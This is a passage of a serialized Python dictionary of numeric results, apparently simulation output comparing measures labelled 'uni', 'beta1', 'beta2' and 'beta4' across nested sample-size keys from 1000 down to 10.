[0.06742218487190954, 1.0114185216903036]}, 10: {'uni': 0.6748084625054919, 'beta1': 0.49249563656701206, 'beta2': 0.8271069531483622, 'beta4': [0.1102081844535559, 1.0086284465073807]}}, 750: {1000: {'uni': 0.016825551470189676, 'beta1': 0.0006897508449283568, 'beta2': 0.2633817678529082, 'beta4': [0.002694730956010692, 1.0791736796957117]}, 750: {'uni': 0.014048162967651316, 'beta1': 0.0007569685985984386, 'beta2': 0.23812376536046528, 'beta4': [0.0028744534835104148, 1.0751155224246156]}, 500: {'uni': 0.02812865188139113, 'beta1': 0.0009302726102285589, 'beta2': 0.28246276144047333, 'beta4': [0.003735251551528202, 1.0597034812793988]}, 400: {'uni': 0.028719991483692222, 'beta1': 0.0017210638478949442, 'beta2': 0.2521281788410891, 'beta4': [0.0057939649484265, 1.0568273537337944]}, 300: {'uni': 0.037442167799592474, 'beta1': 0.0029211389748540683, 'beta2': 0.28567597638856496, 'beta4': [0.007203252380980234, 1.0466619958682954]}, 200: {'uni': 0.06386556896150186, 'beta1': 0.007692212159565061, 'beta2': 0.3106853134678437, 'beta4': [0.008767209623206432, 1.0446977774575243]}, 150: {'uni': 0.07299108201427365, 'beta1': 0.009718847056601669, 'beta2': 0.35201252209709477, 'beta4': [0.01224241715996128, 1.037131011344825]}, 100: {'uni': 0.10404627177637138, 'beta1': 0.022002753992872198, 'beta2': 0.4027319974479996, 'beta4': [0.022041507551256105, 1.0283267345056883]}, 75: {'uni': 0.14415530253194253, 'beta1': 0.037313404141351224, 'beta2': 0.4487551520582601, 'beta4': [0.02308272957055226, 1.024847369129623]}, 50: {'uni': 0.18248580783173268, 'beta1': 0.06745752768881445, 'beta2': 0.5947234162875032, 'beta4': [0.03627165827218634, 1.023766184264096]}, 30: {'uni': 0.32010167971071957, 'beta1': 0.15819047328158758, 'beta2': 0.5964957292802823, 'beta4': [0.05138985807089626, 1.0189550791244228]}, 20: {'uni': 0.39132132239254896, 'beta1': 0.22935783878929317, 'beta2': 0.6897849051318254, 'beta4': [0.0708944891337828, 1.016073773033508]}, 10: {'uni': 0.633040103484694, 
'beta1': 0.47854921461048383, 'beta2': 0.8056053943120505, 'beta4': [0.10927439293108314, 1.0129604700427997]}}, 500: {1000: {'uni': 0.02104866521905844, 'beta1': 0.0011076284762351462, 'beta2': 0.2455918455759565, 'beta4': [0.004128660183094929, 1.1046783319382874]}, 750: {'uni': 0.021757644812859883, 'beta1': 0.0013214567659403334, 'beta2': 0.2521007069597216, 'beta4': [0.003648828733603831, 1.098452444443017]}, 500: {'uni': 0.025306401204840658, 'beta1': 0.0012633210587387736, 'beta2': 0.2634180726409405, 'beta4': [0.004378750756189057, 1.0828752514482893]}, 400: {'uni': 0.03287825204093101, 'beta1': 0.0014649065692894452, 'beta2': 0.29674790610489143, 'beta4': [0.005038844169335943, 1.0820989472446443]}, 300: {'uni': 0.03919582437697649, 'beta1': 0.0032964478006695897, 'beta2': 0.28786217514683415, 'beta4': [0.005155953968189604, 1.0727548580615853]}, 200: {'uni': 0.05265772859784692, 'beta1': 0.007179735146244032, 'beta2': 0.32819508372958256, 'beta4': [0.010450188839043964, 1.0555283397540252]}, 150: {'uni': 0.07426215980201245, 'beta1': 0.01071226895358679, 'beta2': 0.346592044637774, 'beta4': [0.011794864375166105, 1.0557565101703543]}, 100: {'uni': 0.09473751106227296, 'beta1': 0.020243396397742374, 'beta2': 0.40449469255381554, 'beta4': [0.016063490757556757, 1.043220122669047]}, 75: {'uni': 0.1526544667465516, 'beta1': 0.05565631922498948, 'beta2': 0.4948063047875674, 'beta4': [0.028189581940918265, 1.0438445988295184]}, 50: {'uni': 0.19264485864816036, 'beta1': 0.05989197049685187, 'beta2': 0.511997231910665, 'beta4': [0.036553687466457846, 1.0339604748795699]}, 30: {'uni': 0.28834715829751595, 'beta1': 0.1510890312715177, 'beta2': 0.589643860381959, 'beta4': [0.05150135594467901, 1.0281633332742106]}, 20: {'uni': 0.4234892194088218, 'beta1': 0.24125642146873605, 'beta2': 0.6532763993515733, 'beta4': [0.0787906083401277, 1.0224514492768015]}, 10: {'uni': 0.6373839649057689, 'beta1': 0.4687121970847603, 'beta2': 0.8065683045396626, 'beta4': 
[0.10620791541316066, 1.0176075022605533]}}, 400: {1000: {'uni': 0.029961593391199526, 'beta1': 0.0013213432517489214, 'beta2': 0.316112362691536, 'beta4': [0.0062188760201176375, 1.1284533576800397]}, 750: {'uni': 0.039777492934285896, 'beta1': 0.001508579177318669, 'beta2': 0.26143774121719054, 'beta4': [0.004763534234071238, 1.129866844282858]}, 500: {'uni': 0.027808281938736364, 'beta1': 0.002235578290604194, 'beta2': 0.2766486730364398, 'beta4': [0.005669313513005218, 1.1070477515133545]}, 400: {'uni': 0.03448721993106457, 'beta1': 0.002060896148615263, 'beta2': 0.2778739245365818, 'beta4': [0.005947201799245449, 1.1007850822479124]}, 300: {'uni': 0.038881825703913186, 'beta1': 0.0022205198114061166, 'beta2': 0.3449535264664368, 'beta4': [0.006411456500606179, 1.0867240695066167]}, 200: {'uni': 0.050601381926499364, 'beta1': 0.007855702997021598, 'beta2': 0.3119624149190063, 'beta4': [0.009781905195309765, 1.0781068487788759]}, 150: {'uni': 0.08081326564454214, 'beta1': 0.017136945406907373, 'beta2': 0.33243652782842975, 'beta4': [0.015865869842987972, 1.0692547767185392]}, 100: {'uni': 0.10273800778525288, 'beta1': 0.01999439686782297, 'beta2': 0.36994464265717686, 'beta4': [0.01653887961667779, 1.0555295877630724]}, 75: {'uni': 0.1259534595047032, 'beta1': 0.034388184145579245, 'beta2': 0.41308332325358277, 'beta4': [0.020239833747756678, 1.049561450582556]}, 50: {'uni': 0.1849579302990263, 'beta1': 0.07194816166882964, 'beta2': 0.5263002506691301, 'beta4': [0.030427049802672235, 1.0383309410150727]}, 30: {'uni': 0.29600170578233825, 'beta1': 0.12149484405151426, 'beta2': 0.5963678413155551, 'beta4': [0.055869335451423426, 1.0350485321179137]}, 20: {'uni': 0.4076696162001894, 'beta1': 0.27875125626527186, 'beta2': 0.6589684457465328, 'beta4': [0.07279883473388286, 1.0287125415345189]}, 10: {'uni': 0.6334440096496123, 'beta1': 0.4774986007980533, 'beta2': 0.8060685291046624, 'beta4': [0.10574684271567839, 1.0218591798545416]}}, 300: {1000: {'uni': 
0.040572771380711144, 'beta1': 0.0028585526771383826, 'beta2': 0.3400160777578032, 'beta4': [0.007736399745246395, 1.1863024489259968]}, 750: {'uni': 0.04299416638630284, 'beta1': 0.002969868017451892, 'beta2': 0.2909040336627516, 'beta4': [0.007000230903639683, 1.1459452626888829]}, 500: {'uni': 0.05125391371795476, 'beta1': 0.002165638761144419, 'beta2': 0.30806868145586364, 'beta4': [0.005871679176627796, 1.1511125842098944]}, 400: {'uni': 0.04503334265214086, 'beta1': 0.0023602480297385017, 'beta2': 0.3301573120464285, 'beta4': [0.005448144002562095, 1.145418767540703]}, 300: {'uni': 0.044520962521187445, 'beta1': 0.003065998702340159, 'beta2': 0.3114521080701248, 'beta4': [0.006251618359843171, 1.118905728758287]}, 200: {'uni': 0.05777226508003848, 'beta1': 0.006768243637099554, 'beta2': 0.3236793485763856, 'beta4': [0.008218350087491232, 1.0969879140078251]}, 150: {'uni': 0.08387495266946396, 'beta1': 0.010696581160994418, 'beta2': 0.3565871015349815, 'beta4': [0.01144643737733734, 1.0873803983499324]}, 100: {'uni': 0.10709220720060389, 'beta1': 0.03215236993520353, 'beta2': 0.39545976429996976, 'beta4': [0.01766019366672807, 1.0818261167328507]}, 75: {'uni': 0.1401149186955662, 'beta1': 0.04354744217174392, 'beta2': 0.4521360551441519, 'beta4': [0.024005024384320558, 1.0673838858138462]}, 50: {'uni': 0.19916349358035706, 'beta1': 0.05995508419162838, 'beta2': 0.4958590133326075, 'beta4': [0.032857961472088894, 1.0667769493972883]}, 30: {'uni': 0.30982126533332466, 'beta1': 0.1341973395058801, 'beta2': 0.5631122123039468, 'beta4': [0.052474472496597306, 1.0445759847739207]}, 20: {'uni': 0.44932270699336363, 'beta1': 0.2356147017439962, 'beta2': 0.6447178052807758, 'beta4': [0.07448923790120071, 1.0377852803437868]}, 10: {'uni': 0.6199778343521001, 'beta1': 0.4979560542799865, 'beta2': 0.8017114529605197, 'beta4': [0.1056367550997906, 1.033874766370601]}}, 200: {1000: {'uni': 0.06242982893046301, 'beta1': 0.006311543311467927, 'beta2': 0.3546209775823574, 
'beta4': [0.011478130136808503, 1.2109739309006156]}, 750: {'uni': 0.052645349892701816, 'beta1': 0.00713333042905062, 'beta2': 0.35074257146111876, 'beta4': [0.0105252868048244, 1.2171709487406868]}, 500: {'uni': 0.0585692402437379, 'beta1': 0.005896496236549341, 'beta2': 0.3170457782036068, 'beta4': [0.010683921303693576, 1.1842346463599915]}, 400: {'uni': 0.06290504904317053, 'beta1': 0.006712146741219611, 'beta2': 0.3613015164572914, 'beta4': [0.010733396037533883, 1.1849658508273218]}, 300: {'uni': 0.06631100580163242, 'beta1': 0.005249788236707511, 'beta2': 0.3412605845181866, 'beta4': [0.011532162132481623, 1.1808880298303235]}, 200: {'uni': 0.05872088995242879, 'beta1': 0.010287989073223893, 'beta2': 0.44114280047537957, 'beta4': [0.00940073797560703, 1.1526662372069578]}, 150: {'uni': 0.08680495004311953, 'beta1': 0.010432318675711202, 'beta2': 0.369518802507579, 'beta4': [0.011286805439364736, 1.120530358597126]}, 100: {'uni': 0.10514360043392249, 'beta1': 0.022843793816391938, 'beta2': 0.3990470778297997, 'beta4': [0.015352115793283905, 1.1111111828101878]}, 75: {'uni': 0.1548412719042399, 'beta1': 0.03497861146212196, 'beta2': 0.445642088740141, 'beta4': [0.024145019301651638, 1.1051082659349265]}, 50: {'uni': 0.19564761821360332, 'beta1': 0.06808577885293414, 'beta2': 0.4993873294578854, 'beta4': [0.027713298941496742, 1.0881906064783706]}, 30: {'uni': 0.3052472539595662, 'beta1': 0.12861243803016686, 'beta2': 0.5839087481358557, 'beta4': [0.05379333122729778, 1.0638546764114587]}, 20: {'uni': 0.42157212241427794, 'beta1': 0.2969555420165084, 'beta2': 0.6281606948650471, 'beta4': [0.06813417382770101, 1.0565341199655685]}, 10: {'uni': 0.6484698436861565, 'beta1': 0.5003510754676674, 'beta2': 0.7699596346968957, 'beta4': [0.11317240911394794, 1.0456765098967737]}}, 150: {1000: {'uni': 0.08366248595753015, 'beta1': 0.010446216149631336, 'beta2': 0.3932715459128066, 'beta4': [0.011561818709477627, 1.305602936248631]}, 750: {'uni': 0.07118697101283993, 
'beta1': 0.01599980521069211, 'beta2': 0.4054713674024028, 'beta4': [0.015584562017383204, 1.2956283529452284]}, 500: {'uni': 0.08579946452689481, 'beta1': 0.011882995152922274, 'beta2': 0.41246933746770353, 'beta4': [0.01230725834002692, 1.2908217120418506]}, 400: {'uni': 0.10206478064567753, 'beta1': 0.010533507293093415, 'beta2': 0.37815775687446657, 'beta4': [0.013644516225509768, 1.2377646001800173]}, 300: {'uni': 0.06696098811374691, 'beta1': 0.015707664590499864, 'beta2': 0.36108061087642107, 'beta4': [0.011243078434367986, 1.2209644625062315]}, 200: {'uni': 0.07582632025632613, 'beta1': 0.018921317191341738, 'beta2': 0.47381975709885216, 'beta4': [0.009876617862388208, 1.1808296909941922]}, 150: {'uni': 0.07630227709705345, 'beta1': 0.011433401525463767, 'beta2': 0.35839012304833423, 'beta4': [0.012818986604319665, 1.1802180500312938]}, 100: {'uni': 0.10786524730960866, 'beta1': 0.023480822442160966, 'beta2': 0.3971224363546612, 'beta4': [0.01709550425962655, 1.151116255963359]}, 75: {'uni': 0.13969696753181376, 'beta1': 0.03894177698361236, 'beta2': 0.46715246191361925, 'beta4': [0.024033296209019752, 1.1264838497994534]}, 50: {'uni': 0.22699845146544836, 'beta1': 0.06872062711213502, 'beta2': 0.5219019735135487, 'beta4': [0.031972705924561626, 1.127262590512302]}, 30: {'uni': 0.3054153298488651, 'beta1': 0.16648267461758534, 'beta2': 0.5606383325792897, 'beta4': [0.05706286020859661, 1.084204159768233]}, 20: {'uni': 0.4190052140990755, 'beta1': 0.23938694526158966, 'beta2': 0.6567567086969817, 'beta4': [0.06063104673629702, 1.0765768348326303]}, 10: {'uni': 0.6476542690569347, 'beta1': 0.5041556276697949, 'beta2': 0.7851190350954672, 'beta4': [0.10573852458138985, 1.0651944694890478]}}, 100: {1000: {'uni': 0.1036434876877887, 'beta1': 0.022364853152579772, 'beta2': 0.5292843993585943, 'beta4': [0.02314691582316915, 1.4467707103679326]}, 750: {'uni': 0.10335029362377335, 'beta1': 0.030060385136366257, 'beta2': 0.4208440719945956, 'beta4': 
[0.019280741475252636, 1.4088886174584125]}, 500: {'uni': 0.10376192559298011, 'beta1': 0.023777122143537794, 'beta2': 0.5616028046723718, 'beta4': [0.024082841464177725, 1.4090081022445462]}, 400: {'uni': 0.13631741533589026, 'beta1': 0.02388755267987828, 'beta2': 0.49195520157294537, 'beta4': [0.020305042646486506, 1.3649746644812781]}, 300: {'uni': 0.13432139541589827, 'beta1': 0.023480683123979638, 'beta2': 0.4061390685762313, 'beta4': [0.02388635447192918, 1.3133212077424719]}, 200: {'uni': 0.12739786607587839, 'beta1': 0.020107519579753312, 'beta2': 0.45952481877063966, 'beta4': [0.021929161477884124, 1.2871761359143647]}, 150: {'uni': 0.10898370722109206, 'beta1': 0.0294913822797383, 'beta2': 0.5126319119168943, 'beta4': [0.017117421378655046, 1.2559742846324167]}, 100: {'uni': 0.12173415399962331, 'beta1': 0.029129867966793198, 'beta2': 0.5070227168049106, 'beta4': [0.01683981545477253, 1.246721863000209]}, 75: {'uni': 0.13498049555541441, 'beta1': 0.040464719589934244, 'beta2': 0.493025079772468, 'beta4': [0.02304366181944447, 1.1964882870163205]}, 50: {'uni': 0.19534608713221155, 'beta1': 0.0741369784036267, 'beta2': 0.5183169385473728, 'beta4': [0.034831165872610405, 1.1949239176282795]}, 30: {'uni': 0.30805816742549175, 'beta1': 0.1664021904025582, 'beta2': 0.5594858087243508, 'beta4': [0.05065502968190902, 1.1277215135863552]}, 20: {'uni': 0.4129540972085036, 'beta1': 0.22505442505495474, 'beta2': 0.6586789797514485, 'beta4': [0.06766096112265912, 1.1402723916542454]}, 10: {'uni': 0.6573864598611118, 'beta1': 0.4684846064556031, 'beta2': 0.794366053169467, 'beta4': [0.11468185689905351, 1.0863010136620521]}}, 75: {1000: {'uni': 0.18058180891528738, 'beta1': 0.037801701091263615, 'beta2': 0.5375554079408202, 'beta4': [0.022627377065022616, 1.6468214031174047]}, 750: {'uni': 0.17043142639842407, 'beta1': 0.042323861627189194, 'beta2': 0.5726471250293982, 'beta4': [0.027701870488874847, 1.4761000056892333]}, 500: {'uni': 0.1623261189491226, 'beta1': 
0.04190800730982917, 'beta2': 0.5307750705381211, 'beta4': [0.02461383433205972, 1.4697198929879072]}, 400: {'uni': 0.16145797819679752, 'beta1': 0.03647548901238954, 'beta2': 0.5315701591627016, 'beta4': [0.02647811576481531, 1.4535080057475438]}, 300: {'uni': 0.15530089279897658, 'beta1': 0.03237409300356481, 'beta2': 0.5516168967599163, 'beta4': [0.021442907821948645, 1.4123882699990165]}, 200: {'uni': 0.17697523696823808, 'beta1': 0.04474700247588399, 'beta2': 0.5972192196010739, 'beta4': [0.02425642206461014, 1.3622012159367398]}, 150: {'uni': 0.18022118040525992, 'beta1': 0.04973126406029865, 'beta2': 0.5575656144691391, 'beta4': [0.041701851682596956, 1.3762461426964758]}, 100: {'uni': 0.16433779080943353, 'beta1': 0.05197785747946283, 'beta2': 0.7125558130922166, 'beta4': [0.021594167934128383, 1.277995498756572]}, 75: {'uni': 0.15574035820942522, 'beta1': 0.03753623782874999, 'beta2': 0.6594361088676222, 'beta4': [0.03041572556389392, 1.3035561091028944]}, 50: {'uni': 0.18528367625092257, 'beta1': 0.058418019883555695, 'beta2': 0.5859983026896285, 'beta4': [0.03287075645889381, 1.197963424643406]}, 30: {'uni': 0.33717193717239086, 'beta1': 0.15972206611315357, 'beta2': 0.6312902712515196, 'beta4': [0.053274124739167164, 1.1818333324712798]}, 20: {'uni': 0.3778933771594146, 'beta1': 0.24660391594637412, 'beta2': 0.6258005697368938, 'beta4': [0.06425956306492152, 1.1835172283435373]}, 10: {'uni': 0.6436618954411614, 'beta1': 0.46316810126751673, 'beta2': 0.7811380357663973, 'beta4': [0.10631223882126731, 1.1150057118472687]}}, 50: {1000: {'uni': 0.25808978521407333, 'beta1': 0.15286500185699975, 'beta2': 0.5826925265510525, 'beta4': [0.034467286889795036, 1.5864361747408757]}, 750: {'uni': 0.2456412375307066, 'beta1': 0.09688410933656752, 'beta2': 0.6623046558218882, 'beta4': [0.0386809666782265, 1.7464944613556568]}, 500: {'uni': 0.2690821708539631, 'beta1': 0.10807263816836116, 'beta2': 0.6208916018976451, 'beta4': [0.04208865557048511, 
1.8588053084450398]}, 400: {'uni': 0.30779724152757976, 'beta1': 0.07008374742747679, 'beta2': 0.6563945987856405, 'beta4': [0.037440644670713945, 1.567814559277183]}, 300: {'uni': 0.24357058167621404, 'beta1': 0.07610853729969821, 'beta2': 0.6351194247134633, 'beta4': [0.04234563975675384, 1.6172451253474347]}, 200: {'uni': 0.2363976999457054, 'beta1': 0.08107649857407076, 'beta2': 0.6736222653167869, 'beta4': [0.036278935272213875, 1.5304741409120481]}, 150: {'uni': 0.2610121772600879, 'beta1': 0.0970721039952632, 'beta2': 0.6373563878119448, 'beta4': [0.039267605566479145, 1.6152863379484848]}, 100: {'uni': 0.25887956260664496, 'beta1': 0.0749904503307929, 'beta2': 0.6053419211526976, 'beta4': [0.04457433007738977, 1.4866090790047208]}, 75: {'uni': 0.26824734647328496, 'beta1': 0.12671407341083857, 'beta2': 0.7088195394325436, 'beta4': [0.036659734617877866, 1.4757908941788034]}, 50: {'uni': 0.2157848876945146, 'beta1': 0.179047877195215, 'beta2': 0.6430388460295624, 'beta4': [0.0391000990025914, 1.3557498703015833]}, 30: {'uni': 0.3192054118087819, 'beta1': 0.1401721849908211, 'beta2': 0.8343938671057323, 'beta4': [0.04470518427368649, 1.2932248331626337]}, 20: {'uni': 0.44510976621687803, 'beta1': 0.21980400379396323, 'beta2': 0.700861422059113, 'beta4': [0.0769617944142653, 1.2345363706331847]}, 10: {'uni': 0.6347832511266515, 'beta1': 0.46188004670925575, 'beta2': 0.7495583632205935, 'beta4': [0.1305758638756061, 1.2022133212025055]}}, 30: {1000: {'uni': 0.42892879393806227, 'beta1': 0.2900339381216153, 'beta2': 0.9179423439811932, 'beta4': [0.06714029920409238, 2.1317261773472023]}, 750: {'uni': 0.4319538785876898, 'beta1': 0.27188371653759374, 'beta2': 0.9805852295742616, 'beta4': [0.070835223582246, 1.9229053732675119]}, 500: {'uni': 0.5337901444492364, 'beta1': 0.2829226601033528, 'beta2': 0.9905448799057903, 'beta4': [0.07612682556429423, 2.076515079639593]}, 400: {'uni': 0.39881851895745213, 'beta1': 0.26899106022077685, 'beta2': 0.9024444948214578, 
'beta4': [0.05401799877222632, 1.8734518365407848]}, 300: {'uni': 0.6739736484193996, 'beta1': 0.2727368263724961, 'beta2': 0.9523117920073443, 'beta4': [0.05673109471662844, 2.063349821863002]}, 200: {'uni': 0.5330467944857724, 'beta1': 0.23457124841939445, 'beta2': 0.9209146724782004, 'beta4': [0.05392848614071637, 2.1843840064284774]}, 150: {'uni': 0.42169483702592286, 'beta1': 0.23102624314533526, 'beta2': 1.0957735143101772, 'beta4': [0.059481382178213825, 2.1216513918653437]}, 100: {'uni': 0.6626893623786265, 'beta1': 0.26768286418498294, 'beta2': 0.9158900858984962, 'beta4': [0.06812396698026751, 1.699363398801483]}, 75: {'uni': 0.40272005064764316, 'beta1': 0.30576524079527273, 'beta2': 0.8537642594078427, 'beta4': [0.05500177232308054, 1.759340527948887]}, 50: {'uni': 0.4454592863478265, 'beta1': 0.22504133999635, 'beta2': 0.895156147172035, 'beta4': [0.06047032418708357, 1.6131334609036276]}, 30: {'uni': 0.4770799136690089, 'beta1': 0.28771044466108114, 'beta2': 0.9915883541772491, 'beta4': [0.05533692052705431, 1.5508614397335567]}, 20: {'uni': 0.47782291469689375, 'beta1': 0.2938634148011197, 'beta2': 1.0424979003898318, 'beta4': [0.0647423513839497, 1.4508953034317449]}, 10: {'uni': 0.7269557754136924, 'beta1': 0.543897763233955, 'beta2': 1.4307116481814752, 'beta4': [0.10876709935086068, 1.325984870412566]}}, 20: {1000: {'uni': 0.7184217429237197, 'beta1': 0.4206672630068364, 'beta2': 1.1613123688886902, 'beta4': [0.0965283978439124, 2.269289374072948]}, 750: {'uni': 0.8534940710908991, 'beta1': 0.5750736583955173, 'beta2': 1.5370822261631976, 'beta4': [0.11705211724316403, 2.3985476027245425]}, 500: {'uni': 0.7100015488711899, 'beta1': 0.6055030167508085, 'beta2': 1.3366756110977158, 'beta4': [0.08901810252717048, 2.5039934903960024]}, 400: {'uni': 1.024882066657459, 'beta1': 0.6339328801184981, 'beta2': 1.3420862247975562, 'beta4': [0.11404947586800851, 2.286363998147505]}, 300: {'uni': 0.7865904251052587, 'beta1': 0.6071705295391215, 'beta2': 
1.2856926816307097, 'beta4': [0.12113879919712968, 2.5946298846866784]}, 200: {'uni': 0.9392908385222309, 'beta1': 0.5745637648665203, 'beta2': 1.1427799247137727, 'beta4': [0.11765217795293076, 2.3656722555394056]}, 150: {'uni': 1.0463030353811855, 'beta1': 0.505199427703051, 'beta2': 1.136751565860195, 'beta4': [0.08916754586166624, 2.3244992955685637]}, 100: {'uni': 0.7096332746322297, 'beta1': 0.6584700089137518, 'beta2': 1.1955612879172697, 'beta4': [0.0793400828260651, 2.0810546674001063]}, 75: {'uni': 0.5686801021941732, 'beta1': 0.9064292489368356, 'beta2': 1.3967282306451674, 'beta4': [0.08123013465573295, 2.0910440423359367]}, 50: {'uni': 0.776933863952061, 'beta1': 0.6292461657268993, 'beta2': 1.554076323925928, 'beta4': [0.08839935153937976, 2.0327820301000203]}, 30: {'uni': 0.8454812842111926, 'beta1': 0.5691239590988605, 'beta2': 1.5452301545383769, 'beta4': [0.07962479640843732, 1.7801768614752502]}, 20: {'uni': 0.7155766744358403, 'beta1': 0.5367615346103896, 'beta2': 1.3929673945151635, 'beta4': [0.08547240159964724, 1.735089005961175]}, 10: {'uni': 0.814156374135484, 'beta1': 0.6943350919872927, 'beta2': 1.2256108824087348, 'beta4': [0.11175964139287464, 1.531470926335231]}}, 10: {1000: {'uni': 2.1502607486814758, 'beta1': 2.961193440812989, 'beta2': 3.6605411238614165, 'beta4': [0.1685138308258897, 4.444830757691141]}, 750: {'uni': 2.048526112731403, 'beta1': 4.151762896697908, 'beta2': 2.3424163082460217, 'beta4': [0.17031697375504729, 6.406286404246016]}, 500: {'uni': 2.495870260411924, 'beta1': 3.011726545286237, 'beta2': 3.2570697722296176, 'beta4': [0.1655469571590933, 5.777875203382532]}, 400: {'uni': 2.099881963929635, 'beta1': 2.329850145831139, 'beta2': 2.5795427219498634, 'beta4': [0.1891660716402167, 4.113063534228842]}, 300: {'uni': 2.789000548267903, 'beta1': 3.3427408254436237, 'beta2': 2.838444995116569, 'beta4': [0.18080810485975166, 5.743157914926659]}, 200: {'uni': 2.714319577071239, 'beta1': 2.674969297747632, 'beta2': 
4.072106365271376, 'beta4': [0.1673096893670284, 4.156795438643065]}, 150: {'uni': 2.0149494775741075, 'beta1': 2.077635206644789, 'beta2': 3.078141288269228, 'beta4': [0.18767729882393866, 4.360721452118907]}, 100: {'uni': 1.9624533144767615, 'beta1': 3.019315635257828, 'beta2': 4.385469655540163, 'beta4': [0.1900315552805855, 3.3758081408933553]}, 75: {'uni': 2.6676512104969414, 'beta1': 5.305550512983561, 'beta2': 3.1206067511159787, 'beta4': [0.18286929913842218, 4.0556761458530515]}, 50: {'uni': 1.7764267325813035, 'beta1': 3.9516861090331017, 'beta2': 2.409413746837362, 'beta4': [0.17075107365496775, 3.4929925209103336]}, 30: {'uni': 1.979122970210084, 'beta1': 2.7491634214533307, 'beta2': 4.072617355039488, 'beta4': [0.2180077625841771, 3.2609298387610655]}, 20: {'uni': 1.8375355117463443, 'beta1': 2.3463533042171085, 'beta2': 2.503163105574244, 'beta4': [0.21114898088540743, 2.787162687085637]}, 10: {'uni': 2.427976117487353, 'beta1': 2.291521208099949, 'beta2': 2.944087053867329, 'beta4': [0.17835194176860436, 2.5696040508544296]}}}, 0.2: {1000: {1000: {'uni': 0.012280780292956572, 'beta1': 0.0002693384381689057, 'beta2': 0.2090690518552283, 'beta4': [0.0018020663792893063, 1.0502132198035559]}, 750: {'uni': 0.01651843115887509, 'beta1': 0.0005487421176163686, 'beta2': 0.20148442431487518, 'beta4': [0.0024425787732128127, 1.0477212885148937]}, 500: {'uni': 0.025353088253298767, 'beta1': 0.0010396605293617447, 'beta2': 0.23966111809097265, 'beta4': [0.0034985508949701427, 1.038970161345098]}, 400: {'uni': 0.030198518441976466, 'beta1': 0.0012021829507310755, 'beta2': 0.2594658028963883, 'beta4': [0.004490616440973693, 1.0371676882826277]}, 300: {'uni': 0.04730794946255178, 'beta1': 0.0031329041561488774, 'beta2': 0.28118782311034385, 'beta4': [0.006281029145284682, 1.0325050480220268]}, 200: {'uni': 0.05761447368464398, 'beta1': 0.00673361604946926, 'beta2': 0.2975256995575922, 'beta4': [0.009157081044446456, 1.0260278761104196]}, 150: {'uni': 
0.07591819198214711, 'beta1': 0.013946942490422313, 'beta2': 0.34576552304435454, 'beta4': [0.011552729481228095, 1.0240945498285348]}, 100: {'uni': 0.1368580302706355, 'beta1': 0.02526249569893405, 'beta2': 0.38557800822543326, 'beta4': [0.019884020172808305, 1.0191300056011763]}, 75: {'uni': 0.1287872905890261, 'beta1': 0.030867395988007203, 'beta2': 0.4469931272901678, 'beta4': [0.02345546040016165, 1.0175172104748686]}, 50: {'uni': 0.1886157640394165, 'beta1': 0.06213874888664438, 'beta2': 0.4968675395552036, 'beta4': [0.031118814289369752, 1.015031367073955]}, 30: {'uni': 0.3360712300993455, 'beta1': 0.14289602608957086, 'beta2': 0.5929558125978679, 'beta4': [0.05283026319228742, 1.0118317036567743]}, 20: {'uni': 0.37439596985315937, 'beta1': 0.19104466956177601, 'beta2': 0.6679428647952825, 'beta4': [0.058414984981661984, 1.0110032494290406]}, 10: {'uni': 0.5889445132413289, 'beta1': 0.41592284653448874, 'beta2': 0.7578871781713459, 'beta4': [0.09012671207857803, 1.0074859980250308]}}, 750: {1000: {'uni': 0.0146304743338266, 'beta1': 0.0005353139672967838, 'beta2': 0.21543389133258695, 'beta4': [0.002897910486266618, 1.068844018212424]}, 750: {'uni': 0.016626630038685863, 'beta1': 0.000506508364560486, 'beta2': 0.2414624038752328, 'beta4': [0.00262856495812392, 1.0640476852072571]}, 500: {'uni': 0.022089331148686053, 'beta1': 0.0009422277350338522, 'beta2': 0.2479237578547018, 'beta4': [0.003432339519279511, 1.0569707861052167]}, 400: {'uni': 0.030814483057757476, 'beta1': 0.0022416542674890327, 'beta2': 0.24616751839453985, 'beta4': [0.004434707962325523, 1.0509906076614757]}, 300: {'uni': 0.03912077527542531, 'beta1': 0.002888923108919827, 'beta2': 0.2618563052834662, 'beta4': [0.005607512772963669, 1.0431435805548956]}, 200: {'uni': 0.0589807671507729, 'beta1': 0.0064499974624839486, 'beta2': 0.3105643336337045, 'beta4': [0.011864309357212723, 1.0353157317081894]}, 150: {'uni': 0.07154171520476793, 'beta1': 0.009202361892378634, 'beta2': 
0.3433516617468062, 'beta4': [0.012041150326569453, 1.030658596755859]}, 100: {'uni': 0.11355909804218103, 'beta1': 0.016742564920940374, 'beta2': 0.4408459910322566, 'beta4': [0.01589543424873943, 1.0259719809454315]}, 75: {'uni': 0.1470273339563956, 'beta1': 0.04125038029241875, 'beta2': 0.45674725702545044, 'beta4': [0.022555544574912895, 1.0233327169256352]}, 50: {'uni': 0.20394668402714952, 'beta1': 0.05372064930491053, 'beta2': 0.5123425216124959, 'beta4': [0.0304452000024452, 1.0200138365664115]}, 30: {'uni': 0.29386982148971175, 'beta1': 0.11208120239277584, 'beta2': 0.566212490043836, 'beta4': [0.05037312077653552, 1.0162468129423625]}, 20: {'uni': 0.4163288316571464, 'beta1': 0.1957238486090897, 'beta2': 0.6485082504821236, 'beta4': [0.06315650633950089, 1.0124363037896646]}, 10: {'uni': 0.5941397773736758, 'beta1': 0.4652476209261588, 'beta2': 0.7793225324115746, 'beta4': [0.09474615964960159, 1.0118194733649668]}}, 500: {1000: {'uni': 0.02108754785696739, 'beta1': 0.000828450449946846, 'beta2': 0.23804932124856504, 'beta4': [0.003958299034384424, 1.0966419370784732]}, 750: {'uni': 0.0231126438648383, 'beta1': 0.0011984870212622199, 'beta2': 0.24394501858530787, 'beta4': [0.003959031038270082, 1.091515598515446]}, 500: {'uni': 0.022275983484612037, 'beta1': 0.0013732758438846776, 'beta2': 0.2388404713964999, 'beta4': [0.003877722834733257, 1.0768224445920325]}, 400: {'uni': 0.02715548978278476, 'beta1': 0.0014775685950695514, 'beta2': 0.2484098395121755, 'beta4': [0.004386814061610222, 1.0687088791174149]}, 300: {'uni': 0.04498460516730482, 'beta1': 0.003852979657961273, 'beta2': 0.28089547945046694, 'beta4': [0.006194097426606414, 1.0599273761126238]}, 200: {'uni': 0.060660963828962605, 'beta1': 0.005071898129623075, 'beta2': 0.3407020595992429, 'beta4': [0.008591729401854804, 1.0615248105680746]}, 150: {'uni': 0.08186611317553552, 'beta1': 0.009229562012829961, 'beta2': 0.3249653471688221, 'beta4': [0.011742812742923414, 1.0477046573914812]}, 100: 
